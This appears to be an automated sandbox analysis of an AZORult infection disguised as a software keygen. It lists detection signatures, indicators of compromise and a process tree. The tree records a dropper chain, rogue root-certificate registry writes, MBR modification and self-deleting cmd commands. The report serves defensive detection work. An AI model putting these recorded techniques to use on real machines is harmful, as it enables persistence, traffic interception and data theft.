azorult | 2e4dae0f7958695d9b0672f005113fd1de98615973ed56c110462b2772b2bcd5

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
117	ipinfo.io
192	ipinfo.io
332	ipinfo.io
349	ipinfo.io
35	api.ipify.org
86	ip-api.com
113	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3676	Setup.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2692 set thread context of 592	2692	key.exe	89
PID 2704 set thread context of 656	2704	CAC8.tmp.exe	94
PID 2564 set thread context of 2652	2564	C0CA61A12E4C8B38.exe	109

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
4356	4452	WerFault.exe	142
4376	4452	WerFault.exe	142
5184	4452	WerFault.exe	142
5332	4452	WerFault.exe	142
5672	4452	WerFault.exe	142
6072	4452	WerFault.exe	142
4424	4452	WerFault.exe	142
5188	4452	WerFault.exe	142
5336	4452	WerFault.exe	142
5532	4452	WerFault.exe	142
3220	4444	WerFault.exe	291
4652	4444	WerFault.exe	291
4436	4444	WerFault.exe	291
3168	4444	WerFault.exe	291
5724	4444	WerFault.exe	291
4224	4444	WerFault.exe	291
6480	4444	WerFault.exe	291
4532	4444	WerFault.exe	291
6064	4444	WerFault.exe	291

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CAC8.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CAC8.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6448	schtasks.exe
6444	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
5936	timeout.exe
3812	timeout.exe
3140	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
360	taskkill.exe
4132	taskkill.exe
5648	taskkill.exe
4648	TASKKILL.exe
6912	taskkill.exe
6936	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4220	regedit.exe
5012	regedit.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3044	PING.EXE
2608	PING.EXE
200	PING.EXE
4228	PING.EXE

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	116	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	121	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	191	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	331	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	348	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3948	file.exe
3948	file.exe
656	CAC8.tmp.exe
656	CAC8.tmp.exe
3948	file.exe
3948	file.exe
3948	file.exe
3948	file.exe
3948	file.exe
3948	file.exe
2692	key.exe
2692	key.exe
1376	1614921469223.exe
1376	1614921469223.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe
5048	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3948	file.exe
Token: SeImpersonatePrivilege	2692	key.exe
Token: SeTcbPrivilege	2692	key.exe
Token: SeChangeNotifyPrivilege	2692	key.exe
Token: SeCreateTokenPrivilege	2692	key.exe
Token: SeBackupPrivilege	2692	key.exe
Token: SeRestorePrivilege	2692	key.exe
Token: SeIncreaseQuotaPrivilege	2692	key.exe
Token: SeAssignPrimaryTokenPrivilege	2692	key.exe
Token: SeImpersonatePrivilege	2692	key.exe
Token: SeTcbPrivilege	2692	key.exe
Token: SeChangeNotifyPrivilege	2692	key.exe
Token: SeCreateTokenPrivilege	2692	key.exe
Token: SeBackupPrivilege	2692	key.exe
Token: SeRestorePrivilege	2692	key.exe
Token: SeIncreaseQuotaPrivilege	2692	key.exe
Token: SeAssignPrimaryTokenPrivilege	2692	key.exe
Token: SeImpersonatePrivilege	2692	key.exe
Token: SeTcbPrivilege	2692	key.exe
Token: SeChangeNotifyPrivilege	2692	key.exe
Token: SeCreateTokenPrivilege	2692	key.exe
Token: SeBackupPrivilege	2692	key.exe
Token: SeRestorePrivilege	2692	key.exe
Token: SeIncreaseQuotaPrivilege	2692	key.exe
Token: SeAssignPrimaryTokenPrivilege	2692	key.exe
Token: SeImpersonatePrivilege	2692	key.exe
Token: SeTcbPrivilege	2692	key.exe
Token: SeChangeNotifyPrivilege	2692	key.exe
Token: SeCreateTokenPrivilege	2692	key.exe
Token: SeBackupPrivilege	2692	key.exe
Token: SeRestorePrivilege	2692	key.exe
Token: SeIncreaseQuotaPrivilege	2692	key.exe
Token: SeAssignPrimaryTokenPrivilege	2692	key.exe
Token: SeImpersonatePrivilege	2692	key.exe
Token: SeTcbPrivilege	2692	key.exe
Token: SeChangeNotifyPrivilege	2692	key.exe
Token: SeCreateTokenPrivilege	2692	key.exe
Token: SeBackupPrivilege	2692	key.exe
Token: SeRestorePrivilege	2692	key.exe
Token: SeIncreaseQuotaPrivilege	2692	key.exe
Token: SeAssignPrimaryTokenPrivilege	2692	key.exe
Token: SeShutdownPrivilege	2968	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2968	msiexec.exe
Token: SeSecurityPrivilege	2364	msiexec.exe
Token: SeCreateTokenPrivilege	2968	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2968	msiexec.exe
Token: SeLockMemoryPrivilege	2968	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2968	msiexec.exe
Token: SeMachineAccountPrivilege	2968	msiexec.exe
Token: SeTcbPrivilege	2968	msiexec.exe
Token: SeSecurityPrivilege	2968	msiexec.exe
Token: SeTakeOwnershipPrivilege	2968	msiexec.exe
Token: SeLoadDriverPrivilege	2968	msiexec.exe
Token: SeSystemProfilePrivilege	2968	msiexec.exe
Token: SeSystemtimePrivilege	2968	msiexec.exe
Token: SeProfSingleProcessPrivilege	2968	msiexec.exe
Token: SeIncBasePriorityPrivilege	2968	msiexec.exe
Token: SeCreatePagefilePrivilege	2968	msiexec.exe
Token: SeCreatePermanentPrivilege	2968	msiexec.exe
Token: SeBackupPrivilege	2968	msiexec.exe
Token: SeRestorePrivilege	2968	msiexec.exe
Token: SeShutdownPrivilege	2968	msiexec.exe
Token: SeDebugPrivilege	2968	msiexec.exe
Token: SeAuditPrivilege	2968	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2968	msiexec.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3676	Setup.exe
2564	C0CA61A12E4C8B38.exe
3384	C0CA61A12E4C8B38.exe
2652	firefox.exe
1376	1614921469223.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 492 wrote to memory of 1896	492	Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe	78
PID 492 wrote to memory of 1896	492	Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe	78
PID 492 wrote to memory of 1896	492	Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe	78
PID 1896 wrote to memory of 980	1896	cmd.exe	81
PID 1896 wrote to memory of 980	1896	cmd.exe	81
PID 1896 wrote to memory of 980	1896	cmd.exe	81
PID 1896 wrote to memory of 588	1896	cmd.exe	82
PID 1896 wrote to memory of 588	1896	cmd.exe	82
PID 1896 wrote to memory of 588	1896	cmd.exe	82
PID 1896 wrote to memory of 1132	1896	cmd.exe	83
PID 1896 wrote to memory of 1132	1896	cmd.exe	83
PID 1896 wrote to memory of 1132	1896	cmd.exe	83
PID 1896 wrote to memory of 2096	1896	cmd.exe	84
PID 1896 wrote to memory of 2096	1896	cmd.exe	84
PID 1896 wrote to memory of 2096	1896	cmd.exe	84
PID 980 wrote to memory of 2692	980	keygen-pr.exe	85
PID 980 wrote to memory of 2692	980	keygen-pr.exe	85
PID 980 wrote to memory of 2692	980	keygen-pr.exe	85
PID 2096 wrote to memory of 3948	2096	keygen-step-4.exe	86
PID 2096 wrote to memory of 3948	2096	keygen-step-4.exe	86
PID 2096 wrote to memory of 3948	2096	keygen-step-4.exe	86
PID 1132 wrote to memory of 1168	1132	keygen-step-3.exe	87
PID 1132 wrote to memory of 1168	1132	keygen-step-3.exe	87
PID 1132 wrote to memory of 1168	1132	keygen-step-3.exe	87
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 2692 wrote to memory of 592	2692	key.exe	89
PID 1168 wrote to memory of 3044	1168	cmd.exe	90
PID 1168 wrote to memory of 3044	1168	cmd.exe	90
PID 1168 wrote to memory of 3044	1168	cmd.exe	90
PID 3948 wrote to memory of 2704	3948	file.exe	93
PID 3948 wrote to memory of 2704	3948	file.exe	93
PID 3948 wrote to memory of 2704	3948	file.exe	93
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 2704 wrote to memory of 656	2704	CAC8.tmp.exe	94
PID 3948 wrote to memory of 1588	3948	file.exe	96
PID 3948 wrote to memory of 1588	3948	file.exe	96
PID 3948 wrote to memory of 1588	3948	file.exe	96
PID 1588 wrote to memory of 2608	1588	cmd.exe	99
PID 1588 wrote to memory of 2608	1588	cmd.exe	99
PID 1588 wrote to memory of 2608	1588	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe
"C:\Users\Admin\AppData\Local\Temp\Webcam_Broadcaster_v1_serial_keygen_by_Inferno.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:980
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:592
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:588
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1132
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1168
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3044
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3948
    - - C:\Users\Admin\AppData\Roaming\CAC8.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\CAC8.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2704
      - C:\Users\Admin\AppData\Roaming\CAC8.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\CAC8.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:656
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1588
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      PID:3676
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
